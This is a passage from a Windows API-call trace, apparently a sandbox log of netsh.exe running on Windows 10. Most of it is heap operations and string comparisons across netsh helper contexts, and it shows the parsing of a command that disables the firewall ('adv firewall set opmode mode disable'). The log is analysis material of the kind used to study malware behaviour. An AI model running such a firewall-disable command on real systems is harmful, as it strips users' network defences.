(_String1="rpc", _String2="ras") returned 15 [0316.388] _wcsicmp (_String1="rpc", _String2="wfp") returned -5 [0316.388] GetProcessHeap () returned 0x2b30000 [0316.388] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x438) returned 0x2b6af50 [0316.388] GetProcessHeap () returned 0x2b30000 [0316.388] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b61ae0) returned 1 [0316.389] RegisterContext () returned 0x0 [0316.389] GetProcessHeap () returned 0x2b30000 [0316.389] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b63430 [0316.389] GetProcessHeap () returned 0x2b30000 [0316.389] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0316.390] RegisterContext () returned 0x0 [0316.390] _wcsicmp (_String1="winhttp", _String2="advfirewall") returned 22 [0316.390] _wcsicmp (_String1="winhttp", _String2="bridge") returned 21 [0316.390] _wcsicmp (_String1="winhttp", _String2="dhcpclient") returned 19 [0316.390] _wcsicmp (_String1="winhttp", _String2="dnsclient") returned 19 [0316.390] _wcsicmp (_String1="winhttp", _String2="firewall") returned 17 [0316.390] _wcsicmp (_String1="winhttp", _String2="http") returned 15 [0316.390] _wcsicmp (_String1="winhttp", _String2="interface") returned 14 [0316.390] _wcsicmp (_String1="winhttp", _String2="ipsec") returned 14 [0316.390] _wcsicmp (_String1="winhttp", _String2="lan") returned 11 [0316.390] _wcsicmp (_String1="winhttp", _String2="namespace") returned 9 [0316.390] _wcsicmp (_String1="winhttp", _String2="netio") returned 9 [0316.390] _wcsicmp (_String1="winhttp", _String2="p2p") returned 7 [0316.391] _wcsicmp (_String1="winhttp", _String2="ras") returned 5 [0316.391] _wcsicmp (_String1="winhttp", _String2="rpc") returned 5 [0316.391] _wcsicmp (_String1="winhttp", _String2="wfp") returned 3 [0316.391] _wcsicmp (_String1="winhttp", _String2="advfirewall") returned 22 [0316.391] _wcsicmp (_String1="winhttp", _String2="bridge") returned 21 [0316.391] _wcsicmp (_String1="winhttp", _String2="dhcpclient") returned 19 [0316.391] _wcsicmp (_String1="winhttp", _String2="dnsclient") returned 19 [0316.391] _wcsicmp (_String1="winhttp", _String2="firewall") returned 17 [0316.391] _wcsicmp (_String1="winhttp", _String2="http") returned 15 [0316.391] _wcsicmp (_String1="winhttp", _String2="interface") returned 14 [0316.391] _wcsicmp (_String1="winhttp", _String2="ipsec") returned 14 [0316.391] _wcsicmp (_String1="winhttp", _String2="lan") returned 11 [0316.391] _wcsicmp (_String1="winhttp", _String2="namespace") returned 9 [0316.391] _wcsicmp (_String1="winhttp", _String2="netio") returned 9 [0316.391] _wcsicmp (_String1="winhttp", _String2="p2p") returned 7 [0316.392] _wcsicmp (_String1="winhttp", _String2="ras") returned 5 [0316.392] _wcsicmp (_String1="winhttp", _String2="rpc") returned 5 [0316.392] _wcsicmp (_String1="winhttp", _String2="wfp") returned 3 [0316.392] GetProcessHeap () returned 0x2b30000 [0316.392] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x480) returned 0x2b63918 [0316.392] GetProcessHeap () returned 0x2b30000 [0316.392] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6af50) returned 1 [0316.676] RegisterContext () returned 0x0 [0316.676] _wcsicmp (_String1="wlan", _String2="advfirewall") returned 22 [0316.676] _wcsicmp (_String1="wlan", _String2="bridge") returned 21 [0316.676] _wcsicmp (_String1="wlan", _String2="dhcpclient") returned 19 [0316.676] _wcsicmp (_String1="wlan", _String2="dnsclient") returned 19 [0316.676] _wcsicmp (_String1="wlan", _String2="firewall") returned 17 [0316.676] _wcsicmp (_String1="wlan", _String2="http") returned 15 [0316.676] _wcsicmp (_String1="wlan", _String2="interface") returned 14 [0316.676] _wcsicmp (_String1="wlan", _String2="ipsec") returned 14 [0316.676] _wcsicmp (_String1="wlan", _String2="lan") returned 11 [0316.676] _wcsicmp (_String1="wlan", _String2="namespace") returned 9 [0316.676] _wcsicmp (_String1="wlan", _String2="netio") returned 9 [0316.676] _wcsicmp (_String1="wlan", _String2="p2p") returned 7 [0316.677] _wcsicmp (_String1="wlan", _String2="ras") returned 5 [0316.677] _wcsicmp (_String1="wlan", _String2="rpc") returned 5 [0316.677] _wcsicmp (_String1="wlan", _String2="wfp") returned 6 [0316.677] _wcsicmp (_String1="wlan", _String2="winhttp") returned 3 [0316.677] _wcsicmp (_String1="wlan", _String2="advfirewall") returned 22 [0316.677] _wcsicmp (_String1="wlan", _String2="bridge") returned 21 [0316.677] _wcsicmp (_String1="wlan", _String2="dhcpclient") returned 19 [0316.677] _wcsicmp (_String1="wlan", _String2="dnsclient") returned 19 [0316.677] _wcsicmp (_String1="wlan", _String2="firewall") returned 17 [0316.677] _wcsicmp (_String1="wlan", _String2="http") returned 15 [0316.677] _wcsicmp (_String1="wlan", _String2="interface") returned 14 [0316.677] _wcsicmp (_String1="wlan", _String2="ipsec") returned 14 [0316.677] _wcsicmp (_String1="wlan", _String2="lan") returned 11 [0316.677] _wcsicmp (_String1="wlan", _String2="namespace") returned 9 [0316.677] _wcsicmp (_String1="wlan", _String2="netio") returned 9 [0316.678] _wcsicmp (_String1="wlan", _String2="p2p") returned 7 [0316.678] _wcsicmp (_String1="wlan", _String2="ras") returned 5 [0316.678] _wcsicmp (_String1="wlan", _String2="rpc") returned 5 [0316.678] _wcsicmp (_String1="wlan", _String2="wfp") returned 6 [0316.678] _wcsicmp (_String1="wlan", _String2="winhttp") returned 3 [0316.678] GetProcessHeap () returned 0x2b30000 [0316.678] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x4c8) returned 0x2b61730 [0316.678] GetProcessHeap () returned 0x2b30000 [0316.678] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b63918) returned 1 [0316.678] RegisterContext () returned 0x0 [0316.678] _wcsicmp (_String1="winsock", _String2="advfirewall") returned 22 [0316.678] _wcsicmp (_String1="winsock", _String2="bridge") returned 21 [0316.679] _wcsicmp (_String1="winsock", _String2="dhcpclient") returned 19 [0316.679] _wcsicmp (_String1="winsock", _String2="dnsclient") returned 19 [0316.679] _wcsicmp (_String1="winsock", _String2="firewall") returned 17 [0316.679] _wcsicmp (_String1="winsock", _String2="http") returned 15 [0316.679] _wcsicmp (_String1="winsock", _String2="interface") returned 14 [0316.679] _wcsicmp (_String1="winsock", _String2="ipsec") returned 14 [0316.679] _wcsicmp (_String1="winsock", _String2="lan") returned 11 [0316.679] _wcsicmp (_String1="winsock", _String2="namespace") returned 9 [0316.679] _wcsicmp (_String1="winsock", _String2="netio") returned 9 [0316.679] _wcsicmp (_String1="winsock", _String2="p2p") returned 7 [0316.679] _wcsicmp (_String1="winsock", _String2="ras") returned 5 [0316.679] _wcsicmp (_String1="winsock", _String2="rpc") returned 5 [0316.679] _wcsicmp (_String1="winsock", _String2="wfp") returned 3 [0316.679] _wcsicmp (_String1="winsock", _String2="winhttp") returned 11 [0316.680] _wcsicmp (_String1="winsock", _String2="wlan") returned -3 [0316.680] _wcsicmp (_String1="winsock", _String2="advfirewall") returned 22 [0316.680] _wcsicmp (_String1="winsock", _String2="bridge") returned 21 [0316.680] _wcsicmp (_String1="winsock", _String2="dhcpclient") returned 19 [0316.680] _wcsicmp (_String1="winsock", _String2="dnsclient") returned 19 [0316.680] _wcsicmp (_String1="winsock", _String2="firewall") returned 17 [0316.680] _wcsicmp (_String1="winsock", _String2="http") returned 15 [0316.680] _wcsicmp (_String1="winsock", _String2="interface") returned 14 [0316.680] _wcsicmp (_String1="winsock", _String2="ipsec") returned 14 [0316.680] _wcsicmp (_String1="winsock", _String2="lan") returned 11 [0316.680] _wcsicmp (_String1="winsock", _String2="namespace") returned 9 [0316.680] _wcsicmp (_String1="winsock", _String2="netio") returned 9 [0316.681] _wcsicmp (_String1="winsock", _String2="p2p") returned 7 [0316.681] _wcsicmp (_String1="winsock", _String2="ras") returned 5 [0316.681] _wcsicmp (_String1="winsock", _String2="rpc") returned 5 [0316.681] _wcsicmp (_String1="winsock", _String2="wfp") returned 3 [0316.681] _wcsicmp (_String1="winsock", _String2="winhttp") returned 11 [0316.681] _wcsicmp (_String1="winsock", _String2="wlan") returned -3 [0316.681] GetProcessHeap () returned 0x2b30000 [0316.681] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x510) returned 0x2b6af50 [0316.681] GetProcessHeap () returned 0x2b30000 [0316.681] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b61730) returned 1 [0318.690] RegisterContext () returned 0x0 [0318.690] _wcsicmp (_String1="branchcache", _String2="advfirewall") returned 1 [0318.690] _wcsicmp (_String1="branchcache", _String2="bridge") returned -8 [0318.690] _wcsicmp (_String1="branchcache", _String2="dhcpclient") returned -2 [0318.690] _wcsicmp (_String1="branchcache", _String2="dnsclient") returned -2 [0318.690] _wcsicmp (_String1="branchcache", _String2="firewall") returned -4 [0318.690] _wcsicmp (_String1="branchcache", _String2="http") returned -6 [0318.690] _wcsicmp (_String1="branchcache", _String2="interface") returned -7 [0318.690] _wcsicmp (_String1="branchcache", _String2="ipsec") returned -7 [0318.690] _wcsicmp (_String1="branchcache", _String2="lan") returned -10 [0318.690] _wcsicmp (_String1="branchcache", _String2="namespace") returned -12 [0318.690] _wcsicmp (_String1="branchcache", _String2="netio") returned -12 [0318.691] _wcsicmp (_String1="branchcache", _String2="p2p") returned -14 [0318.691] _wcsicmp (_String1="branchcache", _String2="ras") returned -16 [0318.691] _wcsicmp (_String1="branchcache", _String2="rpc") returned -16 [0318.691] _wcsicmp (_String1="branchcache", _String2="wfp") returned -21 [0318.691] _wcsicmp (_String1="branchcache", _String2="winhttp") returned -21 [0318.691] _wcsicmp (_String1="branchcache", _String2="winsock") returned -21 [0318.691] _wcsicmp (_String1="branchcache", _String2="wlan") returned -21 [0318.691] _wcsicmp (_String1="branchcache", _String2="advfirewall") returned 1 [0318.691] _wcsicmp (_String1="branchcache", _String2="bridge") returned -8 [0318.691] GetProcessHeap () returned 0x2b30000 [0318.691] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x558) returned 0x2b6eee8 [0318.691] GetProcessHeap () returned 0x2b30000 [0318.692] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6af50) returned 1 [0318.692] RegisterContext () returned 0x0 [0318.692] GetProcessHeap () returned 0x2b30000 [0318.692] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x48) returned 0x2b636b0 [0318.692] GetProcessHeap () returned 0x2b30000 [0318.692] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x0) returned 1 [0318.692] LoadLibraryExW (lpLibFileName="mprmsg.dll", hFile=0x0, dwFlags=0x800) returned 0x6e0b0000 [0318.810] GetProcAddress (hModule=0x6e0b0000, lpProcName="MprmsgGetErrorString") returned 0x6e0b1370 [0318.810] SetConsoleCtrlHandler (HandlerRoutine=0x928200, Add=1) returned 1 [0318.811] SetThreadUILanguage (LangId=0x0) returned 0x410409 [0319.867] _wcsicmp (_String1="adv", _String2="-?") returned 52 [0319.867] _wcsicmp (_String1="adv", _String2="-h") returned 52 [0319.867] _wcsicmp (_String1="adv", _String2="?") returned 34 [0319.867] _wcsicmp (_String1="adv", _String2="/?") returned 50 [0319.867] _wcsicmp (_String1="adv", _String2="-v") returned 52 [0319.868] _wcsicmp (_String1="adv", _String2="-a") returned 52 [0319.868] _wcsicmp (_String1="adv", _String2="-c") returned 52 [0319.868] _wcsicmp (_String1="adv", _String2="-f") returned 52 [0319.868] _wcsicmp (_String1="adv", _String2="-r") returned 52 [0319.868] _wcsicmp (_String1="adv", _String2="-u") returned 52 [0319.868] _wcsicmp (_String1="adv", _String2="-p") returned 52 [0319.868] GetVersionExW (in: lpVersionInformation=0x397870*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x397870*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0319.868] _vsnwprintf (in: _Buffer=0x933780, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x39785c | out: _Buffer="10.0.15063") returned 10 [0319.869] _vsnwprintf (in: _Buffer=0x933990, _BufferCount=0x103, _Format="%d", _ArgList=0x39784c | out: _Buffer="15063") returned 5 [0319.869] _vsnwprintf (in: _Buffer=0x933ba0, _BufferCount=0x103, _Format="%d", _ArgList=0x39783c | out: _Buffer="0") returned 1 [0319.869] _vsnwprintf (in: _Buffer=0x933db0, _BufferCount=0x103, _Format="%d", _ArgList=0x39782c | out: _Buffer="0") returned 1 [0319.869] GetProcessHeap () returned 0x2b30000 [0319.869] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b63ec0 [0319.870] GetProcessHeap () returned 0x2b30000 [0319.870] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b640a0 [0319.870] GetProcessHeap () returned 0x2b30000 [0319.870] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b63ed8 [0319.870] GetProcessHeap () returned 0x2b30000 [0319.870] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b63ef0 [0319.870] GetProcessHeap () returned 0x2b30000 [0319.870] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d8c0 [0319.870] wcscpy_s (in: _Destination=0x2b6d8c0, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0319.870] GetProcessHeap () returned 0x2b30000 [0319.870] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b63ed8) returned 1 [0319.870] GetProcessHeap () returned 0x2b30000 [0319.870] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b640a0) returned 1 [0319.870] GetProcessHeap () returned 0x2b30000 [0319.871] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d7e8 [0319.871] GetProcessHeap () returned 0x2b30000 [0319.871] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d740 [0319.871] GetProcessHeap () returned 0x2b30000 [0319.871] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x4a) returned 0x2b6cfd0 [0319.871] GetProcessHeap () returned 0x2b30000 [0319.871] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d848 [0319.871] GetProcessHeap () returned 0x2b30000 [0319.871] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dc08 [0319.871] wcscpy_s (in: _Destination=0x2b3dc08, _SizeInWords=0x4, _Source="adv" | out: _Destination="adv") returned 0x0 [0319.871] GetProcessHeap () returned 0x2b30000 [0319.871] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d6f8 [0319.871] GetProcessHeap () returned 0x2b30000 [0319.871] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b5a578 [0319.871] wcscpy_s (in: _Destination=0x2b5a578, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0319.871] GetProcessHeap () returned 0x2b30000 [0319.872] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d908 [0319.872] GetProcessHeap () returned 0x2b30000 [0319.872] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dc68 [0319.872] wcscpy_s (in: _Destination=0x2b3dc68, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0319.872] GetProcessHeap () returned 0x2b30000 [0319.872] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d8d8 [0319.872] GetProcessHeap () returned 0x2b30000 [0319.872] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xe) returned 0x2b6d800 [0319.872] wcscpy_s (in: _Destination=0x2b6d800, _SizeInWords=0x7, _Source="opmode" | out: _Destination="opmode") returned 0x0 [0319.872] GetProcessHeap () returned 0x2b30000 [0319.872] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d7a0 [0319.872] GetProcessHeap () returned 0x2b30000 [0319.872] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xa) returned 0x2b6d818 [0319.872] wcscpy_s (in: _Destination=0x2b6d818, _SizeInWords=0x5, _Source="mode" | out: _Destination="mode") returned 0x0 [0319.872] GetProcessHeap () returned 0x2b30000 [0319.872] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d728 [0319.872] GetProcessHeap () returned 0x2b30000 [0319.873] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x10) returned 0x2b6d7d0 [0319.873] wcscpy_s (in: _Destination=0x2b6d7d0, _SizeInWords=0x8, _Source="disable" | out: _Destination="disable") returned 0x0 [0319.873] GetProcessHeap () returned 0x2b30000 [0319.874] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6cfd0) returned 1 [0319.874] GetProcessHeap () returned 0x2b30000 [0319.874] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d740) returned 1 [0319.874] GetProcessHeap () returned 0x2b30000 [0319.874] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d710 [0319.874] GetProcessHeap () returned 0x2b30000 [0319.874] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dca8 [0319.874] wcscpy_s (in: _Destination=0x2b3dca8, _SizeInWords=0x4, _Source="adv" | out: _Destination="adv") returned 0x0 [0319.874] GetProcessHeap () returned 0x2b30000 [0319.874] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b3dc08) returned 1 [0319.875] GetProcessHeap () returned 0x2b30000 [0319.875] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d848) returned 1 [0319.875] GetProcessHeap () returned 0x2b30000 [0319.875] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d770 [0319.875] GetProcessHeap () returned 0x2b30000 [0319.875] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dc08 [0319.875] wcscpy_s (in: _Destination=0x2b3dc08, _SizeInWords=0x4, _Source="adv" | out: _Destination="adv") returned 0x0 [0319.875] GetProcessHeap () returned 0x2b30000 [0319.875] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b3dca8) returned 1 [0319.875] GetProcessHeap () returned 0x2b30000 [0319.875] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d710) returned 1 [0319.875] GetProcessHeap () returned 0x2b30000 [0319.875] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d740 [0319.875] GetProcessHeap () returned 0x2b30000 [0319.875] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b5a638 [0319.876] wcscpy_s (in: _Destination=0x2b5a638, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0319.876] GetProcessHeap () returned 0x2b30000 [0319.876] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5a578) returned 1 [0319.876] GetProcessHeap () returned 0x2b30000 [0319.876] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d6f8) returned 1 [0319.876] GetProcessHeap () returned 0x2b30000 [0319.876] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d698 [0319.876] GetProcessHeap () returned 0x2b30000 [0319.876] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dca8 [0319.876] wcscpy_s (in: _Destination=0x2b3dca8, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0319.876] GetProcessHeap () returned 0x2b30000 [0319.876] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b3dc68) returned 1 [0319.876] GetProcessHeap () returned 0x2b30000 [0319.876] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d908) returned 1 [0319.876] GetProcessHeap () returned 0x2b30000 [0319.876] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d830 [0319.877] GetProcessHeap () returned 0x2b30000 [0319.877] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xe) returned 0x2b6d758 [0319.877] wcscpy_s (in: _Destination=0x2b6d758, _SizeInWords=0x7, _Source="opmode" | out: _Destination="opmode") returned 0x0 [0319.877] GetProcessHeap () returned 0x2b30000 [0319.877] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d800) returned 1 [0319.877] GetProcessHeap () returned 0x2b30000 [0319.877] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d8d8) returned 1 [0319.877] GetProcessHeap () returned 0x2b30000 [0319.877] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d6f8 [0319.877] GetProcessHeap () returned 0x2b30000 [0319.877] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xa) returned 0x2b6d920 [0319.877] wcscpy_s (in: _Destination=0x2b6d920, _SizeInWords=0x5, _Source="mode" | out: _Destination="mode") returned 0x0 [0319.877] GetProcessHeap () returned 0x2b30000 [0319.878] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d818) returned 1 [0319.878] GetProcessHeap () returned 0x2b30000 [0319.878] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d7a0) returned 1 [0319.878] GetProcessHeap () returned 0x2b30000 [0319.878] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d788 [0319.878] GetProcessHeap () returned 0x2b30000 [0319.878] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x10) returned 0x2b6d860 [0319.878] wcscpy_s (in: _Destination=0x2b6d860, _SizeInWords=0x8, _Source="disable" | out: _Destination="disable") returned 0x0 [0319.878] GetProcessHeap () returned 0x2b30000 [0319.878] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d7d0) returned 1 [0319.878] GetProcessHeap () returned 0x2b30000 [0319.878] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d728) returned 1 [0319.878] GetProcessHeap () returned 0x2b30000 [0319.878] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x1c) returned 0x2b57b08 [0319.879] GetProcessHeap () returned 0x2b30000 [0319.879] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d638 [0319.879] GetProcessHeap () returned 0x2b30000 [0319.879] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dc68 [0319.879] GetProcessHeap () returned 0x2b30000 [0319.879] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b5a698 [0319.879] GetProcessHeap () returned 0x2b30000 [0319.879] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dcb8 [0319.879] GetProcessHeap () returned 0x2b30000 [0319.879] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xe) returned 0x2b6d728 [0319.879] GetProcessHeap () returned 0x2b30000 [0319.879] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xa) returned 0x2b6d680 [0319.879] GetProcessHeap () returned 0x2b30000 [0319.879] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x10) returned 0x2b6d650 [0319.879] GetProcessHeap () returned 0x2b30000 [0319.880] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d818 [0319.880] GetProcessHeap () returned 0x2b30000 [0319.880] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b6d818, Size=0xe) returned 0x2b6d7a0 [0319.880] GetProcessHeap () returned 0x2b30000 [0319.880] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b6d7a0, Size=0x14) returned 0x2b5a578 [0319.880] GetProcessHeap () returned 0x2b30000 [0319.880] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b5a578, Size=0x16) returned 0x2b5a838 [0319.880] GetProcessHeap () returned 0x2b30000 [0319.880] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b5a838, Size=0x26) returned 0x2b5d190 [0319.880] GetProcessHeap () returned 0x2b30000 [0319.880] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b5d190, Size=0x28) returned 0x2b5d1c0 [0319.880] GetProcessHeap () returned 0x2b30000 [0319.880] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b5d1c0, Size=0x2e) returned 0x2b5d5e0 [0319.881] GetProcessHeap () returned 0x2b30000 [0319.881] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b5d5e0, Size=0x30) returned 0x2b5d618 [0319.881] GetProcessHeap () returned 0x2b30000 [0319.881] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b5d618, Size=0x3c) returned 0x2b53f68 [0319.881] GetProcessHeap () returned 0x2b30000 [0319.881] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b53f68, Size=0x3e) returned 0x2b53e48 [0319.881] GetProcessHeap () returned 0x2b30000 [0319.881] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b53e48, Size=0x46) returned 0x2b637f0 [0319.881] GetProcessHeap () returned 0x2b30000 [0319.881] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b637f0, Size=0x48) returned 0x2b63890 [0319.881] GetProcessHeap () returned 0x2b30000 [0319.881] RtlReAllocateHeap (Heap=0x2b30000, Flags=0x0, Ptr=0x2b63890, Size=0x56) returned 0x2b63d08 [0319.881] GetProcessHeap () returned 0x2b30000 [0319.881] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b63d08) returned 1 [0319.882] lstrcmpiW (lpString1="netsh", lpString2="namespace") returned 1 [0319.883] lstrcmpiW (lpString1="netsh", lpString2="branchcache") returned 1 [0319.883] lstrcmpiW (lpString1="netsh", lpString2="advfirewall") returned 1 [0319.884] lstrcmpiW (lpString1="netsh", lpString2="firewall") returned 1 [0319.884] lstrcmpiW (lpString1="netsh", lpString2="interface") returned 1 [0319.884] lstrcmpiW (lpString1="netsh", lpString2="dhcp") returned 1 [0319.884] lstrcmpiW (lpString1="netsh", lpString2="dnsclient") returned 1 [0319.884] lstrcmpiW (lpString1="netsh", lpString2="routing") returned -1 [0319.884] lstrcmpiW (lpString1="netsh", lpString2="ip") returned 1 [0319.884] lstrcmpiW (lpString1="netsh", lpString2="ipv6") returned 1 [0319.884] lstrcmpiW (lpString1="netsh", lpString2="aaaa") returned 1 [0319.884] lstrcmpiW (lpString1="netsh", lpString2="ras") returned -1 [0319.884] _wcsnicmp (_String1="adv", _String2="dum", _MaxCount=0x3) returned -3 [0319.884] _wcsnicmp (_String1="adv", _String2="hel", _MaxCount=0x3) returned -7 [0319.884] _wcsnicmp (_String1="adv", _String2="?", _MaxCount=0x3) returned 34 [0319.884] _wcsnicmp (_String1="adv", _String2="exe", _MaxCount=0x3) returned -4 [0319.884] _wcsnicmp (_String1="adv", _String2="adv", _MaxCount=0x3) returned 0 [0319.885] lstrcmpiW (lpString1="advfirewall", lpString2="namespace") returned -1 [0319.885] lstrcmpiW (lpString1="advfirewall", lpString2="branchcache") returned -1 [0319.885] lstrcmpiW (lpString1="advfirewall", lpString2="advfirewall") returned 0 [0319.885] GetProcessHeap () returned 0x2b30000 [0319.885] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d7a0 [0319.885] GetProcessHeap () returned 0x2b30000 [0319.885] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d800 [0319.885] GetProcessHeap () returned 0x2b30000 [0319.885] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x56) returned 0x2b63d08 [0319.885] GetProcessHeap () returned 0x2b30000 [0319.885] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d848 [0319.885] GetProcessHeap () returned 0x2b30000 [0319.885] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d668 [0319.885] wcscpy_s (in: _Destination=0x2b6d668, 